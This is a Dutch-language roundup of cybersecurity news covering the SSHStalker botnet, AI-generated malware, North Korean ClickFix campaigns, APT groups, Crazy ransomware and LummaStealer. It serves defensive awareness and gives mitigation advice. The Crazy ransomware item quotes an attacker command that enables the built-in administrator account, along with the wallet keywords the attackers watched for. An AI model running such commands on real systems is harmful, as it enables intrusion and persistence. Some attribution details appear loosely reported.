Wazuh, een open source beveiligingsplatform, biedt de mogelijkheden die nodig zijn om proactieve cyberweerbaarheid op te bouwen. Door SIEM- en XDR-mogelijkheden te combineren, stelt Wazuh organisaties in staat om bedreigingen vroegtijdig te detecteren, effectief op incidenten te reageren en hun verdediging voortdurend aan te passen naarmate bedreigingen evolueren. Cyberweerbaarheid gaat verder dan preventie. Een veerkrachtige organisatie wordt niet alleen gedefinieerd door haar vermogen om aanvallen te voorkomen, maar ook door hoe snel ze deze kan identificeren, indammen en ervan kan herstellen, terwijl de activiteiten in stand worden gehouden. Het bereiken van dit niveau van paraatheid vereist beveiligingsplatforms die continue beveiligingsgegevens, real-time detectie en snelle mogelijkheden voor incident response bieden.

In de praktijk is cyberweerbaarheid afhankelijk van een reeks essentiële, proactieve strategieën die richting geven aan beveiligingsoperaties: zichtbaarheid in uw hele omgeving, vroegtijdige detectie van bedreigingen, snelle incident response en herstel en continue verbetering. Wazuh helpt organisaties cyberweerbaarheid in de praktijk te brengen door gecentraliseerde zichtbaarheid, real-time detectie van bedreigingen, geautomatiseerde response, IT-hygiëne en continue beoordeling van de beveiligingsstatus in IT-omgevingen te bieden. De Wazuh SIEM en XDR helpen bij het bieden van gecentraliseerde zichtbaarheid in workloads in gevirtualiseerde, on-premises, cloudgebaseerde en containeromgevingen door continu beveiligingsgegevens te verzamelen en te analyseren. De Wazuh-agent kan worden ingezet op Linux, Windows, macOS en andere ondersteunde besturingssystemen om beveiligingsgegevens te verzamelen, die worden doorgestuurd naar de Wazuh-server.

Wazuh maakt vroegtijdige detectie mogelijk door beveiligingsgegevens uit meerdere bronnen te correleren, waardoor beveiligingsteams kwaadaardig gedrag in een vroeg stadium kunnen identificeren. Wazuh biedt een incident response capability die automatisch reageert op gedetecteerde bedreigingen. Beveiligingsteams kunnen aangepaste response acties configureren, zoals het blokkeren van kwaadaardige IP-adressen, het beëindigen van verdachte processen of het uitschakelen van gecompromitteerde gebruikersaccounts. Wazuh biedt een Wazuh AI analyst service, ontworpen voor Wazuh Cloud-gebruikers, die beveiligingsteams voorziet van AI-ondersteunde analyses en inzichten. Dit helpt organisaties de IT-hygiëne te verbeteren door continue asset visibility, vulnerability detection en configuration assessment. De Wazuh vulnerability detection capability identificeert bekende CVE's in besturingssystemen en geïnstalleerde software door gebruik te maken van informatie over kwetsbaarheden die beschikbaar is in het Wazuh CTI (Centralized Threat Intelligence) platform.

Bron: Wazuh

Onderzoekers van Flare hebben een nieuw Linux botnet ontdekt, genaamd SSHStalker, dat gebruikmaakt van Internet Relay Chat (IRC) voor controle en automatisering om servers te compromitteren via SSH. Het botnet slaagt erin om systemen te infecteren door zwakke of hergebruikte wachtwoorden te raden, waarna de geïnfecteerde hosts worden ingezet voor verdere scans en installaties.

Tijdens honeypot-intrusies begin 2026 dropten aanvallers een Golang binary genaamd "nmap", die in werkelijkheid poort 22 scant om nieuwe doelwitten te vinden. Vervolgens downloaden ze GCC, compileren kleine C-bestanden en pakken gelaagde archieven uit, zoals GS en bootbou.tgz, om IRC-bots en helper tools te installeren. Uit staging data bleek dat er bijna 7.000 recente SSH-scanresultaten van januari 2026 waren, waaronder veel IP-adressen in grote cloud hosting ranges.

Flare onderzoekers identificeerden deze cluster als niet eerder gedocumenteerd na controle van de samples, flow en infrastructuur. Ze omschrijven de operatie als schaal-eerst, opgebouwd uit samengevoegde componenten die prioriteit geven aan uptime, lage kosten en herhaalbaarheid. De onderzoekers constateerden een "dormant persistence", waarbij systemen zijn ingeschreven in controlekanalen, zelfs wanneer er weinig operator-tasking zichtbaar is.

De aanval flow van SSHStalker volgt de build-and-run pipeline, inclusief meerdere IRC-botvarianten geschreven in C en Perl en redundante servers en kanalen. De toolkit bevat ook log cleaners die shell history en utmp/wtmp/lastlog records targeten, en het bevat oudere Linux 2.6.x exploits die nog steeds kunnen werken op vergeten machines.

De persistence methode is direct maar effectief: SSHStalker registreert zijn working directory en voegt een cron job toe die elke minuut draait om een update watchdog uit te voeren. Als verdedigers het hoofdproces doden, controleert het script een PID-bestand en herstart de runner, waardoor de controle vaak binnen ongeveer 60 seconden wordt hersteld. Deze snelle recovery betekent dat responders elk onderdeel van de kit moeten verwijderen, anders keert de bot terug voordat het incident is afgehandeld.

Om herinfectie te voorkomen, wordt aangeraden om SSH-wachtwoordauthenticatie uit te schakelen, key-based access af te dwingen, brute-force pogingen te limiteren en de SSH-exposure te beperken tot vertrouwde netwerken. Op hosts moet men alert zijn op onverwachte GCC of make runs vanuit user directories, /tmp, of /dev/shm, en op nieuwe binaries die minuten na compilatie worden uitgevoerd. Aan de netwerkrand moet men letten op IRC client registratie en channel joins, en egress filtering gebruiken zodat servers geen langdurige outbound TCP sessies naar onbekende IRC infrastructuur kunnen onderhouden.

Bron: Flare

Check Point Research heeft een vroegtijdig AI-gegenereerd malware framework ontdekt, genaamd VoidLink. Dit framework is ontworpen om het genereren van kwaadaardige code te automatiseren en te vereenvoudigen, waardoor de drempel voor cybercriminelen om geavanceerde aanvallen uit te voeren aanzienlijk wordt verlaagd.

VoidLink maakt gebruik van cloud-native technologieën en AI-modellen om verschillende soorten malware te creëren, waaronder ransomware, keyloggers en botnets. Het framework biedt een gebruiksvriendelijke interface waarmee aanvallers specifieke parameters kunnen instellen, zoals het beoogde besturingssysteem, de gewenste functionaliteit en de encryptiemethoden. Vervolgens genereert VoidLink automatisch de bijbehorende broncode, die kan worden gecompileerd en ingezet.

De onderzoekers van Check Point waarschuwen dat VoidLink een aanzienlijke bedreiging vormt, omdat het de productie van malware aanzienlijk versnelt en de complexiteit ervan verbergt. Dit maakt het moeilijker voor security teams om dergelijke aanvallen te detecteren en te voorkomen. Bovendien kan VoidLink worden gebruikt om gepersonaliseerde malware te creëren die is afgestemd op specifieke doelwitten, waardoor de kans op succesvolle infecties toeneemt.

Check Point Research benadrukt dat de opkomst van AI-gegenereerde malware een wake-up call is voor de cybersecurity-industrie. Het is essentieel om proactieve maatregelen te nemen om deze nieuwe dreiging te bestrijden, zoals het ontwikkelen van geavanceerde detectietechnieken en het verhogen van de bewustwording bij gebruikers. Eerder onderzoek van Check Point toonde al aan dat cybercriminelen ChatGPT gebruiken.

Bron: Check Point

Een nieuw ontdekt Linux botnet, genaamd SSHStalker, maakt gebruik van het Internet Relay Chat (IRC) communicatieprotocol voor command-and-control (C2) operaties. Onderzoekers van threat intelligence bedrijf Flare ontdekten dit botnet. Het IRC-protocol, uitgevonden in 1988, bereikte zijn hoogtepunt in de jaren negentig en staat bekend om zijn eenvoud, interoperabiliteit, lage bandbreedtevereisten en het feit dat er geen grafische gebruikersinterface nodig is.

SSHStalker gebruikt klassieke IRC-mechanismen, zoals meerdere C-gebaseerde bots en multi-server/channel redundantie. Dit in tegenstelling tot moderne C2 frameworks. De prioriteit ligt bij robuustheid, schaal en lage kosten, in plaats van stealth en technische vernieuwing. Flare merkt op dat SSHStalker gebruik maakt van luide SSH scans, cron jobs die elke minuut draaien en een grote hoeveelheid CVE's van 15 jaar oud.

SSHStalker verkrijgt initiële toegang via geautomatiseerde SSH-scanning en brute forcing, met behulp van een Go binary die zich voordoet als de open-source netwerkdetectie tool nmap. Gecompromitteerde hosts worden vervolgens gebruikt om te scannen naar extra SSH-targets, wat lijkt op een worm-achtig propagatiemechanisme voor het botnet. Flare vond een bestand met resultaten van bijna 7.000 bot scans, allemaal uit januari, voornamelijk gericht op cloud hosting providers in Oracle Cloud infrastructure.

Na infectie downloadt SSHStalker de GCC tool om payloads op het slachtofferapparaat te compileren. De eerste payloads zijn C-gebaseerde IRC-bots met hard-coded C2 servers en kanalen, die het nieuwe slachtoffer inschrijven in de IRC-infrastructuur van het botnet. Vervolgens haalt de malware archieven op met de namen GS en bootbou, die botvarianten bevatten voor orkestratie en uitvoeringssequencing. Persistentie wordt bereikt via cron jobs die elke 60 seconden draaien en een watchdog-achtig updatemechanisme aanroepen dat controleert of het hoofd botproces actief is en het opnieuw start als het wordt beëindigd.

Het botnet bevat ook exploits voor 16 CVE's die gericht zijn op Linux kernel versies uit de periode 2009-2010. Deze worden gebruikt om privileges te escaleren nadat de eerdere brute-forcing stap toegang verleent tot een gebruiker met lage privileges.

Flare ontdekte dat het botnet AWS key harvesting en website scanning uitvoert. Het bevat ook cryptomining kits, zoals de Ethereum miner PhoenixMiner. Distributed denial-of-service (DDoS) mogelijkheden zijn ook aanwezig, hoewel de onderzoekers nog geen dergelijke aanvallen hebben waargenomen. De bots van SSHStalker verbinden momenteel alleen met de C2 en gaan vervolgens in een inactieve staat, wat duidt op testen of het vergaren van toegang.

Flare heeft SSHStalker niet toegeschreven aan een specifieke dreigingsgroep, maar merkte wel overeenkomsten op met het Outlaw/Maxlas botnet ecosysteem en diverse Roemeense indicatoren. Het bedrijf adviseert om monitoringoplossingen te plaatsen voor compilerinstallatie en -uitvoering op productie servers, en waarschuwingen voor IRC-achtige uitgaande verbindingen. Cron jobs met korte uitvoeringscycli vanuit ongebruikelijke paden zijn ook belangrijke waarschuwingssignalen. Aanbevolen maatregelen omvatten het uitschakelen van SSH-wachtwoordauthenticatie, het verwijderen van compilers uit productie images, het afdwingen van egress filtering en het beperken van de uitvoering vanuit '/dev/shm'.

Bron: Flare | Bron 2: wiz.io | Bron 3: tines.com

Noord-Koreaanse hackers voeren gerichte campagnes uit met behulp van AI-gegenereerde video en de ClickFix-techniek om malware voor macOS en Windows te verspreiden onder doelwitten in de cryptocurrency-sector. Het doel van de dreigingsactor is financieel, zoals blijkt uit de rol van de tools die gebruikt worden bij een aanval op een fintech-bedrijf dat onderzocht werd door Mandiant, een onderzoeksteam van Google. Tijdens het onderzoek vonden de onderzoekers zeven verschillende macOS malware families en schreven de aanval toe aan UNC1069, een dreigingsgroep die ze sinds 2018 volgen.

De aanval had een sterke social engineering component. Het slachtoffer werd via Telegram benaderd vanaf een gecompromitteerd account van een leidinggevende van een cryptocurrency-bedrijf. Na het opbouwen van een vertrouwensrelatie deelden de hackers een Calendly-link die het slachtoffer naar een vervalste Zoom-meeting pagina op de infrastructuur van de aanvallers leidde. Volgens het slachtoffer toonden de hackers een deepfake video van een CEO van een ander cryptocurrency-bedrijf. Tijdens de nep-videogesprek werd de indruk gewekt dat de eindgebruiker audioproblemen ondervond. Onder dit voorwendsel instrueerde de aanvaller het slachtoffer om de problemen op te lossen met behulp van commando's op een webpagina. Mandiant vond commando's op de pagina voor zowel Windows als macOS die de infectieketen zouden starten.

Na het starten van de infectieketen vond Mandiant bewijs van AppleScript-uitvoering, maar kon de inhoud van de payload niet achterhalen, waarna een kwaadaardige Mach-O binary werd ingezet. In de volgende fase voerde de aanvaller zeven verschillende malware families uit: WAVESHAPER, een C++ backdoor die als een achtergronddaemon draait, host systeem informatie verzamelt, communiceert met C2 via HTTP/HTTPS met behulp van curl, en follow-on payloads downloadt en uitvoert. HYPERCALL, een Golang-gebaseerde downloader die een RC4-gecodeerd configuratiebestand leest, verbinding maakt met C2 via WebSockets op TCP 443, kwaadaardige dynamic libraries downloadt en deze reflectief in het geheugen laadt. HIDDENCALL, een Golang-gebaseerde backdoor die reflectief wordt geïnjecteerd door HYPERCALL en hands-on keyboard toegang biedt, command execution en file operations ondersteunt, en additionele malware inzet. SILENCELIFT, een minimale C/C++ backdoor die host informatie en lock screen status naar een hard-coded C2 server stuurt en Telegram communicatie kan onderbreken wanneer uitgevoerd met root privileges. DEEPBREATH, een Swift-gebaseerde data miner die wordt ingezet via HIDDENCALL en macOS TCC protecties omzeilt door de TCC database aan te passen om brede filesystem toegang te krijgen en keychain credentials, browser data, Telegram data, en Apple Notes data steelt. SUGARLOADER, een C++ downloader die een RC4-gecodeerde configuratie gebruikt om next-stage payloads op te halen en persistent werd gemaakt via een handmatig aangemaakte launch daemon. CHROMEPUSH, een C++ browser data miner die wordt ingezet door SUGARLOADER en installeert als een Chromium native messaging host die zich voordoet als een Google Docs Offline extension en keystrokes, credentials, cookies, en optioneel screenshots verzamelt.

Van de gevonden malware heeft SUGARLOADER de meeste detecties op het VirusTotal scanning platform, gevolgd door WAVESHAPER, die door slechts twee producten wordt gemarkeerd. De rest is niet aanwezig in de malware database van het platform. Mandiant zegt dat SILENCELIFT, DEEPBREATH en CHROMEPUSH een nieuwe set tooling voor de dreigingsactor vertegenwoordigen. De onderzoekers beschrijven het volume van malware dat op een host tegen een enkel individu wordt ingezet als ongebruikelijk. Dit bevestigt een gerichte aanval gericht op het verzamelen van zoveel mogelijk data voor twee redenen: cryptocurrency diefstal en het voeden van toekomstige social engineering campagnes door gebruik te maken van de identiteit en data van het slachtoffer.

Sinds 2018 heeft UNC1069 zijn vermogen getoond om te evolueren door nieuwe technieken en tools te gebruiken. In 2023 schakelde de actor over naar doelwitten in de Web3 industrie (gecentraliseerde exchanges, developers, venture capital funds). Vorig jaar veranderde de dreigingsactor zijn doelwit naar financiële diensten en de cryptocurrency industrie in verticals zoals payments, brokerage en wallet infrastructure.

Bron: Mandiant | Bron 2: cloud.google.com | Bron 3: wiz.io | Bron 4: tines.com

Checkpoint Research heeft een rapport gepubliceerd over de activiteiten van de Chinese APT-groep Amaranth Dragon, die ook bekend staat als APT41. De groep maakt gebruik van de kwetsbaarheid CVE-2025-8088 voor gerichte spionage.

Amaranth Dragon is een van de meest gezochte cybercriminele groepen volgens de FBI. De groep staat bekend om zijn complexe aanvallen en het gebruik van geavanceerde tools. In dit geval maakt de groep gebruik van een kwetsbaarheid in een niet nader gespecificeerde software, aangeduid met CVE-2025-8088.

De onderzoekers van Checkpoint Research hebben de aanvalstechnieken en -methoden van Amaranth Dragon geanalyseerd. De groep maakt gebruik van een breed scala aan tools, waaronder het Havoc Framework, een open-source command-and-control framework. Daarnaast gebruikt de groep aangepaste malware en tools om zijn doelwitten te compromitteren en gevoelige informatie te stelen.

Amaranth Dragon richt zich voornamelijk op organisaties in Zuidoost-Azië, waaronder de Filipijnen en Thailand. De groep heeft zich in het verleden gericht op overheidsinstanties, militaire organisaties en bedrijven in de technologiesector. De spionagecampagnes zijn gericht op het verzamelen van inlichtingen over politieke, economische en militaire ontwikkelingen in de regio.

De onderzoekers van Checkpoint Research waarschuwen voor de geavanceerde aanvalstechnieken van Amaranth Dragon en adviseren organisaties om hun beveiligingsmaatregelen te versterken. Het is belangrijk om kwetsbaarheden in software tijdig te patchen en om verdachte activiteiten op het netwerk te monitoren.

Verder maakt de APT gebruik van tools zoals DodgeBox en tgbot-cpp. DodgeBox wordt in verband gebracht met APT41 en tgbot-cpp is een tool voor het automatiseren van taken via Telegram.

Bron: Checkpoint | Bron 2: github.com | Bron 3: nvd.nist.gov | Bron 4: zscaler.com

Check Point Research heeft haar Cyber Security Report 2026 gepubliceerd, waarin de belangrijkste trends en ontwikkelingen op het gebied van cybercriminaliteit worden geanalyseerd. Het rapport laat zien dat cybercriminelen steeds vaker gebruikmaken van geavanceerde technologieën, zoals kunstmatige intelligentie (AI), om hun aanvallen uit te voeren.

Een van de belangrijkste bevindingen is de toename van AI-gestuurde aanvallen. Cybercriminelen gebruiken AI om malware te ontwikkelen die moeilijker te detecteren is, phishing-aanvallen te personaliseren en automatische exploits te genereren. Check Point Research waarschuwde eerder al voor het gebruik van ChatGPT door cybercriminelen.

Het rapport benadrukt ook de aanhoudende dreiging van ransomware. Hoewel het aantal ransomware-aanvallen in sommige sectoren is afgenomen, zijn de aanvallen die plaatsvinden vaak complexer en gerichter. Cybercriminelen eisen hogere losgelden en richten zich op kritieke infrastructuur en grote bedrijven.

Daarnaast constateert Check Point Research een toename van aanvallen op de supply chain. Cybercriminelen richten zich op leveranciers en partners van grote organisaties om toegang te krijgen tot hun netwerken en data. Deze aanvallen zijn vaak moeilijk te detecteren en kunnen grote gevolgen hebben.

Het rapport geeft ook inzicht in de meest voorkomende aanvalstechnieken. Phishing blijft een populaire methode om toegang te krijgen tot systemen en data. Daarnaast maken cybercriminelen gebruik van exploits in bekende software en hardware om kwetsbaarheden uit te buiten.

Check Point Research adviseert organisaties om hun beveiliging te verbeteren door middel van geavanceerde technologieën, zoals AI-gestuurde detectie en preventie. Daarnaast is het belangrijk om medewerkers bewust te maken van de risico's van cyberaanvallen en hen te trainen om phishing-pogingen te herkennen. Regelmatige beveiligingsaudits en pentesten kunnen helpen om kwetsbaarheden in de infrastructuur te identificeren en te verhelpen.

Bron: Check Point | Bron 2: checkpoint.com

Het Konni Advanced Persistent Threat (APT), een groep gelinkt aan Noord-Korea, heeft zijn pijlen gericht op softwareontwikkelaars met behulp van malware die AI-technologieën integreert. Check Point Research meldt dat de groep een nieuwe campagne voert waarbij ontwikkelaars worden bestookt met kwaadaardige bestanden.

De Konni APT staat bekend om zijn aanhoudende spionageactiviteiten en het gebruik van sociaal-engineeringtechnieken om zijn doelwitten te misleiden. In deze recente campagne maakt de groep gebruik van op AI gebaseerde malware om de detectie te omzeilen en zich dieper in de systemen van de slachtoffers te nestelen. De aanvallers richten zich specifiek op ontwikkelaars, mogelijk om toegang te krijgen tot gevoelige broncode, intellectueel eigendom of andere waardevolle informatie.

De malware maakt gebruik van verschillende technieken om detectie te voorkomen, waaronder het gebruik van versleuteling, obfuscatie en het misbruiken van legitieme systeemtools. Daarnaast bevat de malware AI-componenten die zijn ontworpen om het gedrag van de gebruiker te analyseren en zich dienovereenkomstig aan te passen, waardoor detectie door traditionele beveiligingsoplossingen verder wordt bemoeilijkt.

Onderzoekers van Check Point Research waarschuwen dat deze campagne een aanzienlijke bedreiging vormt voor de softwareontwikkelingsindustrie. Ze adviseren ontwikkelaars om extra waakzaam te zijn en beveiligingsmaatregelen te implementeren om zich te beschermen tegen deze geavanceerde aanvallen. Dit omvat het regelmatig updaten van software, het gebruik van sterke wachtwoorden, het inschakelen van multi-factor authenticatie en het implementeren van gedragsanalyse-tools om verdachte activiteiten te detecteren.

De Konni APT is al langer actief en staat bekend om zijn betrokkenheid bij diverse cyberaanvallen, waaronder spionagecampagnes en gerichte aanvallen op specifieke industrieën. De groep wordt in verband gebracht met de Noord-Koreaanse overheid en wordt ervan verdacht financiële middelen te genereren voor het regime via cybercriminaliteit.

De dreiging van AI-gestuurde malware neemt toe, en deze campagne van de Konni APT is een duidelijk voorbeeld van hoe geavanceerde technologieën worden misbruikt door kwaadwillende actoren. Het is essentieel dat organisaties op de hoogte blijven van de nieuwste dreigingen en proactieve maatregelen nemen om hun systemen en gegevens te beschermen.

Bron: Check Point Research | Bron 2: rewterz.com | Bron 3: ti.qianxin.com

Een lid van de Crazy ransomware groep misbruikt legitieme employee monitoring software, Net Monitor for Employees Professional, en de SimpleHelp remote support tool. Dit stelt hen in staat om persistentie in bedrijfsnetwerken te behouden, detectie te omzeilen en de omgeving voor te bereiden op de uiteindelijke ransomware deployment.

Onderzoekers van Huntress ontdekten meerdere incidenten waarbij de aanvallers Net Monitor for Employees Professional installeerden, samen met SimpleHelp voor remote toegang. Dit gebeurde terwijl ze probeerden op te gaan in de normale administratieve activiteiten. In een van de gevallen installeerden de aanvallers Net Monitor for Employees Professional met behulp van Windows Installer (msiexec.exe). Hierdoor konden ze de monitoring agent direct vanaf de site van de ontwikkelaar op de gecompromitteerde systemen installeren. Na installatie kon de tool op afstand het bureaublad van het slachtoffer bekijken, bestanden overzetten en commando's uitvoeren, waardoor de aanvallers volledige interactieve toegang tot de systemen kregen. De aanvallers probeerden ook het lokale administrator account te activeren met het commando: `net user administrator /active:yes`.

Voor extra persistentie downloaden en installeerden de aanvallers de SimpleHelp remote access client via PowerShell commando's. De bestandsnamen leken op de legitieme Visual Studio vshost.exe. Na de installatie konden de aanvallers remote toegang behouden, zelfs als de employee monitoring tool werd verwijderd. Het SimpleHelp binary werd soms vermomd met bestandsnamen die gerelateerd waren aan OneDrive: `C:\ProgramData\OneDriveSvc\OneDriveSvc.exe`.

De aanvallers gebruikten de monitoring software om op afstand commando's uit te voeren, bestanden over te zetten en systeemactiviteit in real time te monitoren. Onderzoekers zagen ook dat de aanvallers Windows Defender uitschakelden door te proberen de bijbehorende services te stoppen en te verwijderen.

In een incident configureerden de hackers monitoring regels in SimpleHelp om hen te waarschuwen wanneer apparaten cryptocurrency wallets openden of remote management tools gebruikten. Ze bereidden zich voor op de ransomware deployment en mogelijke cryptocurrency diefstal. De SimpleHelp agent monitorde op cryptocurrency-gerelateerde keywords, waaronder wallet services (metamask, exodus, wallet, blockchain), exchanges (binance, bybit, kucoin, bitrue, poloniex, bc.game, noones), blockchain explorers (etherscan, bscscan) en het betalingsplatform payoneer. Daarnaast werd er ook gemonitord op remote access tool keywords, waaronder RDP, anydesk, ultraview, teamview en VNC.

Het gebruik van meerdere remote access tools zorgde voor redundantie, waardoor de aanvallers toegang behielden, zelfs als een tool werd ontdekt of verwijderd. Hoewel slechts één incident leidde tot de daadwerkelijke deployment van Crazy ransomware, vermoedt Huntress dat dezelfde dreigingsactor achter beide incidenten zit. Hetzelfde bestandsnaam (vhost.exe) en overlappende C2 infrastructuur werden in beide gevallen hergebruikt.

Huntress waarschuwt organisaties om nauwlettend te controleren op ongeautoriseerde installaties van remote monitoring en support tools. Omdat beide breaches mogelijk werden gemaakt door gecompromitteerde SSL VPN credentials, moeten organisaties MFA afdwingen op alle remote access services.

Bron: Huntress | Bron 2: wiz.io | Bron 3: tines.com

Moderne oorlogsvoering strekt zich steeds verder uit dan fysieke slagvelden en infiltreert in toenemende mate digitale servers en supply chains die de nationale defensie beschermen. De sector wordt momenteel geconfronteerd met een onophoudelijke reeks cyberoperaties van zowel door de staat gesteunde actoren als criminele groepen. Deze aanvallen richten zich niet langer uitsluitend op militaire entiteiten, maar vallen ook defensiecontractanten, vliegtuigfabrikanten en individuele werknemers aan om gevoelige gegevens te stelen en cruciale logistiek te verstoren.

De belangrijkste aanvalsvectoren zijn aanzienlijk geëvolueerd en verschuiven naar de exploitatie van edge devices en geavanceerde social engineering. Aanvallers omzeilen traditionele enterprise security perimeters door zich te richten op ongecontroleerde virtual private networks (VPN's) en firewalls, of door wervingsprocessen te manipuleren om personeel te compromitteren. Deze strategische verschuiving stelt aanvallers in staat om initiële toegang te krijgen en langdurige persistentie te handhaven binnen waardevolle netwerken zonder standaard endpoint detectiesystemen te activeren. Google Cloud-analisten identificeerden deze escalerende dreigingen en constateerden een duidelijke toename van zero-day exploits en insider threat-tactieken.

Een voorbeeld van deze technische evolutie is de INFINITERED malware, ingezet door de China-nexus groep UNC6508. Deze tool is een voorbeeld van de verschuiving naar stealthy, langdurige spionage tegen onderzoeks- en defensie-instellingen. De malware functioneert als een recursive dropper, die zichzelf nestelt in legitieme systeembestanden van de REDCap-applicatie om software-updates te overleven. Dit persistentie-mechanisme zorgt ervoor dat, zelfs als beheerders hun systemen patchen, de kwaadaardige code automatisch opnieuw in de core files wordt geïnjecteerd, waardoor de aanvallers een voet aan de grond houden.

Eenmaal binnen gebruiken de aanvallers een zeer specifieke methode om gevoelige communicatie te exfiltreren zonder standaard netwerkverkeer te genereren. Ze misbruiken legitieme e-mailfilterregels en passen deze aan om automatisch berichten door te sturen die overeenkomen met specifieke keywords gerelateerd aan nationale veiligheid, militaire uitrusting of buitenlands beleid. Door reguliere expressies te gebruiken om e-mail bodies en onderwerpen te scannen, leidt de malware stilletjes kritieke informatie om naar door de actor gecontroleerde accounts.

Om deze geavanceerde dreigingen tegen te gaan, moeten organisaties verder gaan dan reactieve maatregelen. Defensiecontractanten zouden rigoureuze monitoring voor edge devices moeten implementeren en strikte behavioral analytics voor e-mail forwarding regels moeten afdwingen. Daarnaast kan het versterken van verificatieprocessen voor extern personeel en het segmenteren van kritieke supply chain netwerken het risico op succesvolle infiltratie aanzienlijk verminderen.

Bron: Google Cloud

Een geavanceerde cyberdreiging, bekend als RU-APT-ChainReaver-L, heeft gebruikers van verschillende besturingssystemen in het vizier door middel van gecompromitteerde mirror websites en GitHub-repositories. Deze campagne wordt beschouwd als een van de meest uitgebreide supply chain aanvallen van de laatste tijd, waarbij Windows, macOS en iOS tegelijkertijd worden getroffen.

De aanval maakt gebruik van geavanceerde technieken, waaronder codeondertekening met geldige certificaten, misleidende redirect chains en malware-distributie via legitieme cloudservices, wat detectie door traditionele beveiligingssystemen bemoeilijkt. De infrastructuur achter de campagne is grootschalig en complex. Aanvallers hebben twee grote file-sharing mirror services gecompromitteerd: Mirrored.to en Mirrorace.org, die wereldwijd door software download websites worden gebruikt. Door kwaadaardige code in deze platforms te injecteren, hebben de aanvallers de vertrouwde infrastructuur omgezet in een mechanisme voor de verspreiding van infostealer malware.

Wanneer gebruikers bestanden proberen te downloaden via deze gecompromitteerde services, worden ze omgeleid via meerdere tussenliggende pagina's die ontworpen zijn om beveiligingsdetectie te omzeilen, terwijl de indruk van legitimiteit wordt gehandhaafd. Analisten van GRAPH identificeerden deze campagne tijdens een onderzoek naar een aanzienlijke hoeveelheid gebruikersgegevens die op dark web marktplaatsen verschenen. Het onderzoeksteam herleidde deze gestolen accounts tot een gecoördineerde infectieoperatie die al enkele maanden actief was. Via hun Extended Detection and Response platform en threat hunting operaties ontdekten GRAPH onderzoekers een aanvalsinfrastructuur die meer dan 100 domeinen omvatte, waaronder command-and-control servers, infectiepagina's en redirection intermediaries.

De aanvallers werken hun tools en infrastructuur voortdurend bij, waarbij ze malware signatures en delivery methoden met korte tussenpozen aanpassen om antivirusdetectie te ontwijken. De aanvalsmethodologie varieert afhankelijk van het besturingssysteem van het slachtoffer. Windows-gebruikers worden omgeleid naar cloud storage services zoals MediaFire en Dropbox, waar wachtwoord beveiligde archieven ondertekende malware bevatten die legitiem lijkt voor beveiligingssoftware. macOS-slachtoffers worden geconfronteerd met ClickFix-aanvallen, waarbij misleidende pagina's gebruikers ertoe bewegen handmatig terminal commando's uit te voeren die de MacSync Stealer malware downloaden en installeren. iOS-gebruikers worden doorverwezen naar frauduleuze VPN-applicaties in de Apple App Store die vervolgens phishing-aanvallen lanceren tegen hun apparaten.

Het gebruik van GitHub door de campagne toont een geavanceerd begrip van de blinde vlekken van security teams aan. Onderzoekers van GRAPH merkten op dat aanvallers 50 GitHub-accounts hadden gecompromitteerd, waarvan vele jaren geleden waren geregistreerd en een gevestigde historie hadden, om kwaadaardige repositories te hosten. Deze accounts werden voornamelijk in november 2025 gekaapt en hergebruikt om gekraakte software en activeringstools te verspreiden, specifiek gericht op gebruikers die op zoek zijn naar illegale software. De Windows malware opereert als een infostealer, die screenshots maakt, cryptocurrency wallet data, messenger databases en browser credentials extraheert, en bestanden kopieert van Desktop, Documents en Downloads folders. De macOS MacSync Stealer opereert fileless in het geheugen en verzamelt browser data, cryptocurrency wallets inclusief Ledger en Trezor, SSH keys en AWS credentials. Organisaties wordt aangeraden uitgebreide verdedigingsstrategieën te implementeren, waarbij gebruikerseducatie de meest kritieke laag vormt, aangezien infecties afhankelijk zijn van social engineering.

Bron: Google

Er is een sterke toename waargenomen in LummaStealer infecties, als gevolg van social engineering campagnes die de ClickFix-techniek gebruiken om de CastleLoader malware te verspreiden. LummaStealer, ook bekend als LummaC2, is een infostealer operatie die functioneert als een malware-as-a-service (MaaS) platform. Deze werd in mei 2025 verstoord toen meerdere techbedrijven en rechtshandhavingsinstanties 2.300 domeinen en de centrale commandostructuur in beslag namen.

Infostealing malware richt zich op diverse gevoelige data, zoals in webbrowsers opgeslagen inloggegevens en cookies, cryptocurrency wallet details en documenten, sessiecookies, authenticatietokens, VPN-configuraties en accountgegevens. Hoewel de rechtshandhavingsoperatie de LummaStealer activiteit ernstig verstoorde, werd de MaaS-operatie in juli 2025 hervat.

Een nieuw rapport van cybersecuritybedrijf Bitdefender waarschuwt dat LummaStealer operaties aanzienlijk zijn toegenomen tussen december 2025 en januari 2026. De malware wordt nu verspreid via een malware loader genaamd CastleLoader, en maakt steeds meer gebruik van ClickFix-technieken. CastleLoader speelt een centrale rol in het verspreiden van LummaStealer door middel van delivery chains. Het modulaire, in-memory executiemodel, uitgebreide obfuscatie en flexibele command-and-control communicatie maken het volgens Bitdefender onderzoekers geschikt voor malware distributie op deze schaal.

CastleLoader dook begin 2025 op en verspreidt meerdere families van infostealers en remote access trojans (Stealc, RedLine, Rhadamanthys, MonsterV2, CastleRAT, SectopRAT, NetSupport RAT, WarmCookie) via diverse methoden, waaronder ClickFix. De malware loader is een zwaar versluierde script-based (AutoIT of Python) malware loader die de LummaStealer payload volledig in het geheugen decrypt, laadt en uitvoert. Het maakt gebruik van meerdere obfuscatie lagen, waaronder dictionary-based renaming van variabelen en functies, gecodeerde strings die tijdens runtime worden gedecodeerd, grote hoeveelheden junk code en dead branches, en rekenkundige en logische bewerkingen die triviale resultaten opleveren.

Voordat CastleLoader LummaStealer uitvoert, voert het omgeving- en sandboxcontroles uit om te bepalen of het wordt geanalyseerd, en past het bestandspaden en persistentielocaties aan afhankelijk van welke security producten op de host worden gedetecteerd. Persistentie wordt bereikt door het kwaadaardige AutoIT-script naar een persistentiepad te kopiëren, de interpreter naar een afzonderlijke locatie te kopiëren en een internet shortcut bestand op Startup te maken dat de interpreter met het script als argument lanceert.

Bitdefender ontdekte dat CastleLoader opzettelijk een mislukte DNS lookup initieert voor een niet-bestaand domein, wat resulteert in een DNS-fout. Bitdefender stelt dat artefacten van dit netwerkgedrag kunnen worden gebruikt om CastleLoader activiteit te detecteren.

In een rapport in november merkten onderzoekers van Recorded Future's Insikt Group op dat een domein op de infrastructuur van CastleLoader fungeerde als een command-and-control (C2) server voor LummaStealer, wat wijst op een vroege connectie tussen de twee operaties.

